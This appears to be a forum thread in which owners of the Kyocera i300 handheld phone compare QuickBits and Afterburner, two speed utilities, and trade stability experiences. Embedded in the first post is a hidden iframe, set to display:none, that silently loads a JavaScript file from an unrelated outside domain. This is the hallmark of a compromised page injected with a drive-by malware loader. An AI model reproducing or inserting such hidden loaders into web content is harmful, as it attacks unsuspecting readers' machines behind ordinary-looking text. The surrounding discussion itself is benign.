Try Quickbits (www.2bitsoftware.com), available as a 30-day trial version. Seems to work fine, but back up first for safety.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
QuickBits is NOT an overclocking utility. It does not alter the speed of your handheld's CPU and avoids the complications which can result from doing so. However, QuickBits is fully compatible and complementary with overclocking utilities.
I use Afterburner and overclock some apps (mostly big ones like HanDBase, ThoughtManager, and Quickoffice), and don't have any problems w/ my I300. You just shouldn't overclock EVERY app, b/c this will cause your I300 to freeze, do a little dance, and throw up.
Although I don't use Quickbits, I know it's not overclocking, and I've heard good things about it (on non-I300 units)

my error in quickbits.. it may not work on mhz cpu speed but can still cause errors on our phones, especially if yuo have hacks installed. just my opinion...
Don't expect miracles from this utility which does not alter CPU speed but seems rather to optimize certain routines like text scrolling and screen redraws. Maybe because of the way it works it's kinder and gentler than say, Afterburner, a true overclocking utility. It tanked my I-300 right quick. I suppose though you could use Afterburner safely if you had the patience to cherry-pick the apps it boosts. Anyway, text scrolling at least seems brisker with Quickbits, so try it yourselves and share your experiences - takes only 33K - no resets yet and, yes, lots of hacks.
